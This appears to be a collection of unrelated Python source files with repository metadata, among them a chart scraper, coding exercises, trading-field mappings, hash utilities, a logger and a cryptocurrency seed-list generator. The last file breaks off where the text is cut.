7cd08b85a12191df9c24b5d26bcedcd5412f72de
|
[] |
no_license
|
k156/hello
|
3de815de569b38f8260e774e57b138f4da43f480
|
f5a7f386d3f78d15d7f166a95ad25724e168f472
|
refs/heads/master
| 2020-04-04T23:15:38.252126 | 2019-05-03T05:57:00 | 2019-05-03T05:57:00 | 156,352,395 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 589 |
py
|
# Scrape the Melon chart page and print the rank and title cell of each
# top-50 row.
from bs4 import BeautifulSoup
import requests
from time import sleep

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
url = "https://www.melon.com/chart/index.htm#params%5Bidx%5D=1/"

# Fetch the page with a browser-like User-Agent (the site blocks the
# default requests UA) and parse it.
page_source = requests.get(url, headers=headers).text
document = BeautifulSoup(page_source, 'html.parser')

# Each chart entry is a <tr id="lst50"> row.
for row in document.select("tr#lst50"):
    cells = row.select('td')
    rank = cells[1].text
    title = cells[4]
    # singer =
    # print(rank, title, type(title))
    print(rank, title, type(title))
|
[
"[email protected]"
] | |
48ee6be5fa369aab7a24d7f1be33ef53dfa886a5
|
e452f89c51180487f2ed68c33ca2fed54e14a967
|
/1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/02_Conditional-Statements/01.Lab-01-Excellent-Result.py
|
4d9450ac08bdcaf06642e2351b5898ce2cc0b984
|
[
"MIT"
] |
permissive
|
karolinanikolova/SoftUni-Software-Engineering
|
c996f18eea9fb93164ab674614e90b357ef4858a
|
7891924956598b11a1e30e2c220457c85c40f064
|
refs/heads/main
| 2023-06-21T23:24:55.224528 | 2021-07-22T16:15:59 | 2021-07-22T16:15:59 | 367,432,464 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 436 |
py
|
# 1. Check for an excellent result
# The first task in this topic is to write a console program that reads a
# grade (a real number) entered by the user and prints "Excellent!" if the
# grade is 5.50 or higher.

grade = float(input())

if grade >= 5.50:
    print("Excellent!")
|
[
"[email protected]"
] | |
b9e01fd5c696231a6b883b2817e73b84b476dbaa
|
1646b3fe9000c3109695e99b4bb75679577906ff
|
/236.LowestCommonAncestorOfABinaryTree.py
|
78bdf6a542e4686bb190fc7b9d792fdb40e9fbeb
|
[] |
no_license
|
yao9208/lc
|
5ecf6720886beb951c9a70433f53a0ec0bcb74dc
|
024c1b5c98a9e85706e110fc2be8dcebf0f460c3
|
refs/heads/master
| 2020-04-03T20:55:40.199637 | 2017-02-10T08:30:46 | 2017-02-10T08:30:46 | 56,478,941 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 554 |
py
|
class Solution(object):
    def lowestCommonAncestor(self, root, p, q):
        """
        Return the lowest common ancestor of nodes p and q in the binary
        tree rooted at root (None when the subtree contains neither).

        :type root: TreeNode
        :type p: TreeNode
        :type q: TreeNode
        :rtype: TreeNode
        """
        # An empty subtree contributes nothing; a subtree rooted at one of
        # the targets is its own answer.
        if not root:
            return root
        if root == p or root == q:
            return root
        # Search both children for the targets.
        found_left = self.lowestCommonAncestor(root.left, p, q)
        found_right = self.lowestCommonAncestor(root.right, p, q)
        # A hit on each side means the targets straddle this node, so it is
        # the ancestor; otherwise propagate whichever side found anything.
        if found_left and found_right:
            return root
        return found_left or found_right
|
[
"[email protected]"
] | |
1f2424d5b24baaab7fe1c1ce30f92fcfc2ec1dd1
|
7ea5517353f325fc0bcc0e552233b103335bc9ec
|
/QUANTAXIS/QAMarket/common.py
|
143b325f56b9ba86e312c9a8f7bbeee7f3dbd0fd
|
[
"MIT"
] |
permissive
|
lxqjswa/QUANTAXIS
|
304f20c3ba957d51664a8736faca6a777a658583
|
a5f89b28a75d1a5094630a4ed166f596840528b1
|
refs/heads/master
| 2020-03-28T08:45:47.064394 | 2018-09-08T07:15:26 | 2018-09-08T07:15:26 | 147,987,895 | 1 | 0 |
MIT
| 2018-09-09T02:52:34 | 2018-09-09T02:52:34 | null |
UTF-8
|
Python
| false | false | 5,031 |
py
|
# shipane
# "申报时间", "证券代码", "证券名称", "操作", "委托状态", "委托数量", "成交数量", "撤消数量", , "委托价格", "成交均价", "合同编号", "委托子业务", "约定号", "对方账户", "参考汇率", "结算币种", "交易币种", "证券中文名", "出错信息
from QUANTAXIS.QAUtil.QAParameter import ORDER_DIRECTION, TRADE_STATUS, ORDER_STATUS
# Mapping from Chinese column/field captions (as produced by broker trade
# terminals, e.g. ShiPanE) to the English attribute names used internally.
# NOTE(review): a few keys ('场外撤单', '场内撤单', '未成交', '全部撤单')
# appear twice with identical values; the later literal wins, so behaviour
# is unaffected — consider deduplicating.
cn_en_compare = {'明细': 'id',
                 '证券代码': 'code',
                 '市场代码': 'market_code',
                 '证券名称': 'name',
                 '股票余额': 'amount',
                 '可用余额': 'sell_available',
                 '冻结数量': 'frozen',
                 '买卖标志': 'towards',
                 '撤消数量': 'cancel_amount',
                 '撤单数量': 'cancel_amount',
                 '订单类型': 'order_type',
                 '操作': 'towards',  # buy/sell flag used by the simulated-trading interface
                 '委托价格': 'order_price',
                 '委托数量': 'order_amount',
                 '成交价格': 'trade_price',
                 '成交数量': 'trade_amount',
                 '状态说明': 'status',
                 '备注': 'status',  # status field from the simulated-trading interface
                 '场外撤单': 'cancel_outside',
                 '场内撤单': 'cancel_inside',
                 '未成交': 'pending',
                 '全部撤单': 'cancel_all',
                 '委托时间': 'order_time',
                 '合同编号': 'realorder_id',  # order id from the simulated-trading interface
                 '撤销数量': 'cancel_amount',
                 '委托编号': 'realorder_id',
                 '批次号': 'pc_id',
                 '盈亏': 'pnl',
                 "": 'None',
                 '成本金额': 'cost',
                 '盈亏估算': 'pnl_prob',
                 '成本价': 'hold_price',
                 '实现盈亏': 'pnl_money_already',
                 '盈亏比例(%)': 'pnl_ratio',
                 '市价': 'price',
                 '市值': 'market_value',
                 '交易市场': 'SSE',
                 '股东帐户': 'shareholders',
                 '实际数量': 'total_amount',
                 '可申赎数量': 'redemption_number',
                 '资讯': 'message',
                 '汇率': 'exchange_rate',
                 '沪港深港市场': 'hkmarket',
                 '成本价港币': 'hold_price_hk',
                 '买入成本价港币': 'buy_price_hk',
                 '买入在途数量': 'buy_onway',
                 '卖出在途数量': 'sell_onway',
                 '场内废单': 'failled',
                 '场外撤单': 'cancel_outside',
                 '场内撤单': 'cancel_inside',
                 '未成交': 'pending',
                 '已成交': 'finished',
                 '全部撤单': 'cancel_all',
                 '成交均价': 'trade_price',  # traded (average) price
                 '成交金额': 'trade_money',
                 '成交编号': 'trade_id',
                 '委托状态': 'status',
                 '申报时间': 'order_time',
                 '委托日期': 'order_date',
                 '委托子业务': 'order_subjob',
                 '约定号': 'yd_id',
                 '对方账户': 'other_account',
                 '参考汇率': 'refer_exchange',
                 '结算币种': 'settlement_currency',
                 '交易币种': 'trade_currency',
                 '证券中文名': 'CNname',
                 '出错信息': 'error',
                 '成交时间': 'trade_time'}

# Chinese buy/sell captions mapped to QUANTAXIS ORDER_DIRECTION constants.
trade_towards_cn_en = {
    '买入': ORDER_DIRECTION.BUY,
    '买': ORDER_DIRECTION.BUY,
    '卖出': ORDER_DIRECTION.SELL,
    '卖': ORDER_DIRECTION.SELL,
    '申购': ORDER_DIRECTION.ASK,
    '申': ORDER_DIRECTION.ASK,
    '证券买入': ORDER_DIRECTION.BUY,
    '证券卖出': ORDER_DIRECTION.SELL,
    '派息': ORDER_DIRECTION.XDXR,
    '': ORDER_DIRECTION.OTHER
}

# Chinese order-status captions mapped to QUANTAXIS ORDER_STATUS constants.
order_status_cn_en = {
    '已报': ORDER_STATUS.QUEUED,  # order accepted by the trading endpoint
    '未成交': ORDER_STATUS.QUEUED,
    '已确认': ORDER_STATUS.QUEUED,  # IPO subscription accepted by the trading endpoint
    '场内废单': ORDER_STATUS.FAILED,
    '废单': ORDER_STATUS.FAILED,  # order violates trading rules; rejected by the endpoint
    '未报': ORDER_STATUS.FAILED,  # order not yet accepted by the endpoint
    '场外废单': ORDER_STATUS.FAILED,
    '已成交': ORDER_STATUS.SUCCESS_ALL,
    '已成': ORDER_STATUS.SUCCESS_ALL,
    '全部成交': ORDER_STATUS.SUCCESS_ALL,
    '部成': ORDER_STATUS.SUCCESS_PART,  # order partially filled
    '已撤单': ORDER_STATUS.CANCEL_ALL,
    '全部撤单': ORDER_STATUS.CANCEL_ALL,
    '已撤': ORDER_STATUS.CANCEL_ALL,
    '已报待撤': ORDER_STATUS.QUEUED,  # cancel request submitted and accepted, still pending (e.g. outside trading hours)
    '场内撤单': ORDER_STATUS.CANCEL_ALL,
}
|
[
"[email protected]"
] | |
e53c50114defbb9001385514940c7f56071976fb
|
20c20938e201a0834ccf8b5f2eb5d570d407ad15
|
/abc032/abc032_b/8108449.py
|
b7cc2e87327a45202a747c78434008246dab432c
|
[] |
no_license
|
kouhei-k/atcoder_submissions
|
8e1a1fb30c38e0d443b585a27c6d134bf1af610a
|
584b4fd842ccfabb16200998fe6652f018edbfc5
|
refs/heads/master
| 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 159 |
py
|
# Count the number of distinct substrings of length k in S.
S = input()
k = int(input())
import collections
# Frequencies are accumulated but only the number of distinct keys is used.
table = collections.defaultdict(int)
for i in range(len(S) - k + 1):
    table[S[i:k + i]] += 1
# len(table) gives the distinct-substring count directly, without
# materialising table.keys() into a throwaway list first.
print(len(table))
|
[
"[email protected]"
] | |
a570f27a7c1170f47520d0fd62cc5ef08e71442c
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/833679/snippet.py
|
4ab198d900965b661dbb57b70023f8d4c2106db6
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 |
Python
|
UTF-8
|
Python
| false | false | 2,067 |
py
|
#
# HashUtils - Simple functions derivated from standard Python hashlib.
#
__author__ = 'Mauro Baraldi ([email protected])'
__version__ = '0.0.2: February 17, 2011'
import re
import hashlib
from datetime import datetime
class Hash:
    """Common facilities using hashlib standard lib. Algorithm used in all
    methods: MD5

    Returns of method is hashlib.md5(object_to_hash).hexdigest()

    Example of use:

    from hashutils import Hash
    h = Hash()

    >>> h.now_hash()
    'b3036f7831dc1394f1dcb6b989561d79'
    >>> h.today_hash()
    'b3036f7831dc1394f1dcb6b989561d79'
    >>> h.string_hash("My name is Earl.")
    'ad05d8348194adf6d6190a2ae550e099'
    >>> h.file_hash('/home/mauro/passwords.txt')
    '404627e52574140007692512e3ce2fa9'
    >>> h.file_hash('/home/mauro/passwords.txt', 1024)
    '997dd0044bc676fdf3f9db0560e642d0'
    >>> h.from_date_hash((2001, 3, 1, 12, 45), '%Y/%m/%d %H:%M')
    'fc573499016722e5ff0747f2dc7f4971'
    """

    def __init__(self):
        pass

    def today_hash(self):
        """ Return hash form datetime.today() function in format %Y%m%d """
        self.today = datetime.today().strftime('%Y%m%d')
        # Encode before hashing: md5 requires bytes on Python 3.
        return hashlib.md5(self.today.encode('utf-8')).hexdigest()

    def now_hash(self):
        """ Return hash form datetime.today() function in format %Y%m%d%H%M%S """
        # Bug fix: previously formatted with '%Y%m%d', which made now_hash()
        # identical to today_hash() instead of including the time of day as
        # its own docstring states.
        self.today = datetime.today().strftime('%Y%m%d%H%M%S')
        return hashlib.md5(self.today.encode('utf-8')).hexdigest()

    def from_date_hash(self, date, strfmt):
        """ Return hash of *date* (a tuple of ints matching *strfmt*),
        normalised through strptime/strftime before hashing. """
        # Replace each format letter with 'd' so the int tuple can be
        # rendered with %-formatting, then round-trip through strptime to
        # normalise (zero-pad) the text.  Charset fixed from '[a-zA-z]',
        # which accidentally also matched '[', ']', '^', '_' and '`'.
        self.format = re.compile('[a-zA-Z]').sub('d', strfmt)
        self.build_date = datetime.strptime(self.format % date, strfmt)
        self.date = self.build_date.strftime(strfmt)
        return hashlib.md5(self.date.encode('utf-8')).hexdigest()

    def string_hash(self, string):
        """ Return hash form a given string. """
        return hashlib.md5(string.encode('utf-8')).hexdigest()

    def file_hash(self, fp, size=128):
        """ Return hash form a given file. Default first 128 bytes."""
        # Open in binary mode and return hexdigest(): the old code opened
        # 'r+' (text, write-capable) and returned raw digest(), contradicting
        # the class docstring and its own hex-string examples.
        with open(fp, 'rb') as temp:
            return hashlib.md5(temp.read(size)).hexdigest()
|
[
"[email protected]"
] | |
a5ba5bef1c1edc9aa06f3fe87232501307f1a1b2
|
c61c9bedba1968bfaf571ac3996b696fc35890a6
|
/Chapter16/16-3.py
|
ce29436d126c588d3560f122a3141296ca60d21e
|
[] |
no_license
|
ArunRamachandran/ThinkPython-Solutions
|
497b3dbdeba1c64924fe1d9aa24204a9ca552c5b
|
1a0872efd169e5d39b25134960168e3f09ffdc99
|
refs/heads/master
| 2020-04-01T10:23:20.255132 | 2014-11-07T17:04:52 | 2014-11-07T17:04:52 | 25,806,318 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 652 |
py
|
class Time(object):
''' to represent the time of a day '''
t1 = Time()
t2 = Time()
t1.h = 4
t1.m = 185
t1.s = 0
t2.h = 1
t2.m = 56
t2.s = 0
def add_time(t1,t2):
sum_time = Time()
sum_time.h = t1.h + t2.h
sum_time.m = t1.m + t2.m
sum_time.s = t1.s + t2.s
if sum_time.s > 60:
val = sum_time.s / 60
sum_time.s -= (60 * val)
sum_time.m += val
if sum_time.m > 60:
val_1 = sum_time.m / 60
sum_time.m -= (60 * val_1)
sum_time.h += val_1
print '%.2d:%.2d:%.2d' % (sum_time.h,sum_time.m,sum_time.s)
print "t1 ",
print '%.2d:%.2d:%.2d' % (t1.h, t1.m, t1.s)
print "t2 ",
print '%.2d:%.2d:%.2d' % (t2.h, t2.m, t2.s)
add_time(t1,t2)
|
[
"[email protected]"
] | |
5e875e702c4451a5fc79d1144425698fbc263c61
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_twining.py
|
87ddda74e438d11af092105cfd9569d7a62ef7c6
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 238 |
py
|
from xai.brain.wordbase.adjectives._twin import _TWIN
# Class header: adjective entry derived from the base form "twin".
class _TWINING(_TWIN):
    """Wordbase entry for the adjective 'twining' (basic form: 'twin')."""

    def __init__(self):
        # Initialise the base adjective, then record this entry's metadata.
        _TWIN.__init__(self)
        self.name = "TWINING"
        self.specie = 'adjectives'
        self.basic = "twin"
        self.jsondata = {}
|
[
"[email protected]"
] | |
e354add3beb18f533d7157be7068cbf4b7dd45db
|
0b5b699459252996f058c8303a1f7093e7951ba0
|
/food_delivery_app/restaurants/filters.py
|
1c91e8a329ec67287390dbb43fe190d8aa8fe536
|
[
"MIT"
] |
permissive
|
MahmoudFarid/Food-Delivery-App
|
f145293548949618ae47d81f4ee7c35629fdaf5c
|
8411ca48497e7347fe0258b720c2d2a566bb6e88
|
refs/heads/master
| 2020-04-12T04:40:22.129486 | 2018-12-23T21:52:09 | 2018-12-23T21:52:09 | 162,302,419 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
from django_filters import rest_framework as filters
from .models import Order
class OrderFilter(filters.FilterSet):
    """django-filter FilterSet for Order querysets: allows filtering the
    order list endpoint by customer and by status (exact-match lookups)."""

    class Meta:
        # Model and fields the filters are generated from.
        model = Order
        fields = ['customer', 'status']
|
[
"[email protected]"
] | |
0964ca87b1476b689cf1f886a4e21864d6b7bb07
|
d488f052805a87b5c4b124ca93494bc9b78620f7
|
/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/functions/deploy/labels_util.py
|
5e9da496f8ef33a5e94a3f93ad396421b5bf7ef7
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
PacktPublishing/DevOps-Fundamentals
|
5ce1fc938db66b420691aa8106ecfb3f9ceb1ace
|
60597e831e08325c7e51e8557591917f7c417275
|
refs/heads/master
| 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,718 |
py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'functions deploy' utilities for labels."""
from googlecloudsdk.api_lib.functions import util as api_util
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.command_lib.util.args import labels_util as args_labels_util
NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE = (
'Label keys starting with `deployment` are reserved for use by deployment '
'tools and cannot be specified manually.')
def CheckNoDeploymentLabels(flag_name, label_names):
  """Check for labels that start with `deployment`, which is not allowed.

  Args:
    flag_name: The name of the flag to include in case of an exception
    label_names: A list of label names to check

  Raises:
    calliope_exceptions.InvalidArgumentException
  """
  # Iterating over `label_names or ()` covers both None and an empty list.
  for label_name in label_names or ():
    if label_name.startswith('deployment'):
      raise calliope_exceptions.InvalidArgumentException(
          flag_name, NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE)
def SetFunctionLabels(function, update_labels, remove_labels, clear_labels):
  """Set the labels on a function based on args.

  Args:
    function: the function to set the labels on
    update_labels: a dict of <label-name>-<label-value> pairs for the labels to
      be updated, from --update-labels
    remove_labels: a list of the labels to be removed, from --remove-labels
    clear_labels: a bool representing whether or not to clear all labels,
      from --clear-labels

  Returns:
    A bool indicating whether or not any labels were updated on the function.
  """
  # Work on a copy so the caller's --update-labels dict is not mutated when
  # the bookkeeping label is injected below (the old code wrote through to
  # the caller's dict).
  labels_to_update = dict(update_labels) if update_labels else {}
  labels_to_update['deployment-tool'] = 'cli-gcloud'
  labels_diff = args_labels_util.Diff(additions=labels_to_update,
                                      subtractions=remove_labels,
                                      clear=clear_labels)
  messages = api_util.GetApiMessagesModule()
  labels_update = labels_diff.Apply(messages.CloudFunction.LabelsValue,
                                    function.labels)
  if labels_update.needs_update:
    function.labels = labels_update.labels
    return True
  return False
|
[
"[email protected]"
] | |
4374e0f6d09d3fac569ee903abba1a0b69fc1c4a
|
da7740e0d20dc7dd9775d4a53da7c0f7779834e1
|
/MultiPlanarUNet/logging/logger.py
|
4147e6a51aeb3f3ead32053006a4c39614f4c56e
|
[
"MIT"
] |
permissive
|
xiaochengcike/MultiPlanarUNet
|
ca8fa35a8372b8d107bb16b29018e2413c108075
|
99c73ba2936b63282338cf31fe27086d414d2e62
|
refs/heads/master
| 2020-04-18T19:25:51.699311 | 2019-01-10T09:39:59 | 2019-01-10T09:39:59 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,492 |
py
|
import os
import inspect
from MultiPlanarUNet.utils.decorators import accepts
class Logger(object):
    """File-backed logger that writes messages to text files under
    <base_path>/logs, optionally echoing them to the screen, and that can
    temporarily replace the built-in print() via the context-manager
    protocol."""

    def __init__(self, base_path, print_to_screen=True, active_file=None,
                 overwrite_existing=False, print_calling_method=True):
        # base_path: model folder; logs are kept in its 'logs' subfolder.
        self.base_path = os.path.abspath(base_path)
        self.path = os.path.join(self.base_path, "logs")
        self.overwrite_existing = overwrite_existing

        # Get built in print function
        # (if overwritten globally, Logger still maintains a reference to the
        # true print function)
        # NOTE(review): subscripting __builtins__ assumes it is a dict, which
        # holds in an imported module but not when run as __main__ (where it
        # is the builtins module) — confirm intended usage.
        self.print_f = __builtins__["print"]

        if not os.path.exists(self.path):
            os.mkdir(self.path)

        # Print options
        self.separator = "-" * 80
        self.print_to_screen = print_to_screen
        self.print_calling_method = print_calling_method

        # Set paths to log files
        self.log_files = {}
        self.currently_logging = {}
        self.active_log_file = active_file or "log"

    def __repr__(self):
        return "<MultiPlanarUNet.logging.Logger object>"

    def __str__(self):
        return "Logger(base_path=%s, print_to_screen=%s, " \
               "overwrite_existing=%s)" % (self.base_path,
                                           self.print_to_screen,
                                           self.overwrite_existing)

    def new_log_file(self, filename):
        """Create <logs>/<filename>.txt and make it the active log target.

        Raises OSError if the file exists and overwrite_existing is False.
        """
        file_path = os.path.join(self.path, "%s.txt" % filename)

        if os.path.exists(file_path):
            if self.overwrite_existing:
                os.remove(file_path)
            else:
                raise OSError("Logging path: %s already exists. "
                              "Initialize Logger(overwrite_existing=True) "
                              "to overwrite." % file_path)

        self.log_files[filename] = file_path
        self.currently_logging[filename] = None
        self.active_log_file = filename

        # Add reference to model folder in log
        ref = "Log for model in: %s" % self.base_path
        self._add_to_log(ref, no_print=True)

    @property
    def print_to_screen(self):
        return self._print_to_screen

    @print_to_screen.setter
    @accepts(bool)
    def print_to_screen(self, value):
        self._print_to_screen = value

    @property
    def print_calling_method(self):
        return self._print_calling_method

    @print_calling_method.setter
    @accepts(bool)
    def print_calling_method(self, value):
        self._print_calling_method = value

    @property
    def log(self):
        # Full text of the currently active log file.
        with open(self.log_files[self.active_log_file], "r") as log_f:
            return log_f.read()

    @property
    def active_log_file(self):
        return self._active_log_file

    @active_log_file.setter
    @accepts(str)
    def active_log_file(self, file_name):
        # Lazily create the log file on first activation.
        if file_name not in self.log_files:
            self.new_log_file(file_name)
        self._active_log_file = file_name

    def _add_to_log(self, *args, no_print=False, **kwargs):
        # Echo to screen (unless suppressed) and append to the active file.
        if self.print_to_screen and not no_print:
            self.print_f(*args, **kwargs)

        with open(self.log_files[self.active_log_file], "a") as log_file:
            self.print_f(*args, file=log_file, **kwargs)

    def _log(self, caller, print_calling_owerwrite=None, *args, **kwargs):
        # Emit a "Logged by" header whenever the calling context changes.
        if caller != self.currently_logging[self.active_log_file]:
            self.currently_logging[self.active_log_file] = caller
            if print_calling_owerwrite is not None:
                # Per-call override of the print_calling_method setting.
                print_calling = print_calling_owerwrite
            else:
                print_calling = self.print_calling_method
            if print_calling:
                self._add_to_log("%s\n>>> Logged by: %s" % (self.separator,
                                                            self.currently_logging[self.active_log_file]))
        self._add_to_log(*args, **kwargs)

    def __call__(self, *args, print_calling_method=None, **kwargs):
        # Identify the caller ("'func' in 'file.py'") via the call stack.
        caller = inspect.stack()[1]
        caller = "'%s' in '%s'" % (caller[3], caller[1].rpartition("/")[2])
        self._log(caller, print_calling_method, *args, **kwargs)

    def __enter__(self):
        """
        Context manager
        Sets logger as global print function within context
        """
        __builtins__["print"] = self
        return self

    def __exit__(self, *args):
        """
        Revert to default print function in global scope
        """
        __builtins__["print"] = self.print_f
        return self
|
[
"[email protected]"
] | |
0637d34c345649b17b190752d77694ce2c4b4bb1
|
57c697ffebe2e9b3f5bd5da8122638152e4d0e9f
|
/contrib/seeds/makeseeds.py
|
4b8d889c83c3bb295de84aab0658b5cb0d5ef45c
|
[
"MIT"
] |
permissive
|
Globycoin/glbcore
|
4039ddb98dec19dadebf8b2d583f27e6c083d9cd
|
d5dd9b5475915956849658373d8658286a08781b
|
refs/heads/master
| 2020-03-22T20:02:44.733133 | 2018-11-15T00:42:39 | 2018-11-15T00:42:39 | 140,569,343 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,519 |
py
|
#!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
# Target number of seed entries to emit.
NSEEDS=512

# At most this many seeds per autonomous system (applied to IPv4 only).
MAX_SEEDS_PER_ASN=2

# Minimum chain height a node must report to qualify.
MIN_BLOCKS = 615801

# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
    ""
}

import re
import sys
import dns.resolver
import collections

# host:port formats accepted from the seeder dump.
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
# Accepted (known and recent) user-agent strings.
PATTERN_AGENT = re.compile(r"^(/GlobycoinCore:2.2.(0|1|99)/)$")
def parseline(line):
    """Parse one seeder dump line into a result dict, or return None if the
    line is malformed, the address is unusable, or a sanity check fails."""
    sline = line.split()
    if len(sline) < 11:
        return None
    m = PATTERN_IPV4.match(sline[0])
    sortkey = None
    ip = None
    if m is None:
        m = PATTERN_IPV6.match(sline[0])
        if m is None:
            m = PATTERN_ONION.match(sline[0])
            if m is None:
                return None
            else:
                net = 'onion'
                ipstr = sortkey = m.group(1)
                port = int(m.group(2))
        else:
            net = 'ipv6'
            if m.group(1) in ['::']: # Not interested in localhost
                return None
            ipstr = m.group(1)
            sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
            port = int(m.group(2))
    else:
        # Do IPv4 sanity check
        ip = 0
        for i in range(0,4):
            if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
                return None
            ip = ip + (int(m.group(i+2)) << (8*(3-i)))
        if ip == 0:
            return None
        net = 'ipv4'
        sortkey = ip
        ipstr = m.group(1)
        port = int(m.group(6))
    # Skip bad results.
    # NOTE(review): sline[1] is a string (from str.split()), so comparing it
    # to the int 0 is always False and this check never skips anything —
    # confirm whether the string '0' was intended.
    if sline[1] == 0:
        return None
    # Extract uptime %.
    uptime30 = float(sline[7][:-1])
    # Extract Unix timestamp of last success.
    lastsuccess = int(sline[2])
    # Extract protocol version.
    version = int(sline[10])
    # Extract user agent.
    if len(sline) > 11:
        agent = sline[11][1:] + sline[12][:-1]
    else:
        agent = sline[11][1:-1]
    # Extract service flags.
    service = int(sline[9], 16)
    # Extract blocks.
    blocks = int(sline[8])
    # Construct result.
    return {
        'net': net,
        'ip': ipstr,
        'port': port,
        'ipnum': ip,
        'uptime': uptime30,
        'lastsuccess': lastsuccess,
        'version': version,
        'agent': agent,
        'service': service,
        'blocks': blocks,
        'sortkey': sortkey,
    }
def filtermultiport(ips):
    '''Filter out hosts with more nodes per IP'''
    # Bucket entries by their sort key (one bucket per distinct address),
    # then keep only the addresses that occur exactly once.
    by_address = collections.defaultdict(list)
    for entry in ips:
        by_address[entry['sortkey']].append(entry)
    return [bucket[0] for bucket in by_address.values() if len(bucket) == 1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
    """Limit the result to max_total IPv4 entries with at most max_per_asn
    entries per autonomous system; IPv6 and onion entries pass through
    unfiltered (appended after the IPv4 results)."""
    # Sift out ips by type
    ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
    ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
    ips_onion = [ip for ip in ips if ip['net'] == 'onion']

    # Filter IPv4 by ASN
    result = []
    asn_count = {}
    for ip in ips_ipv4:
        if len(result) == max_total:
            break
        try:
            # Reverse the octets and query the Cymru origin-ASN DNS zone;
            # the TXT answer begins with the AS number.
            asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
            if asn not in asn_count:
                asn_count[asn] = 0
            if asn_count[asn] == max_per_asn:
                continue
            asn_count[asn] += 1
            result.append(ip)
        except Exception:
            # Bug fix: narrowed from a bare 'except:' so KeyboardInterrupt
            # and SystemExit are no longer swallowed; lookup/parse failures
            # are still reported and the entry skipped, as before.
            sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')

    # TODO: filter IPv6 by ASN

    # Add back non-IPv4
    result.extend(ips_ipv6)
    result.extend(ips_onion)
    return result
def main():
    """Read seeder dump lines from stdin, apply the quality filters, and
    print the resulting seed list (one host:port per line) to stdout."""
    lines = sys.stdin.readlines()
    ips = [parseline(line) for line in lines]

    # Skip entries with invalid address.
    ips = [ip for ip in ips if ip is not None]
    # Skip entries from suspicious hosts.
    ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
    # Enforce minimal number of blocks.
    ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
    # Require service bit 1.
    ips = [ip for ip in ips if (ip['service'] & 1) == 1]
    # Require at least 50% 30-day uptime.
    ips = [ip for ip in ips if ip['uptime'] > 50]
    # Require a known and recent user agent.
    ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
    # Sort by availability (and use last success as tie breaker)
    ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
    # Filter out hosts with multiple bitcoin ports, these are likely abusive
    ips = filtermultiport(ips)
    # Look up ASNs and limit results, both per ASN and globally.
    ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
    # Sort the results by IP address (for deterministic output).
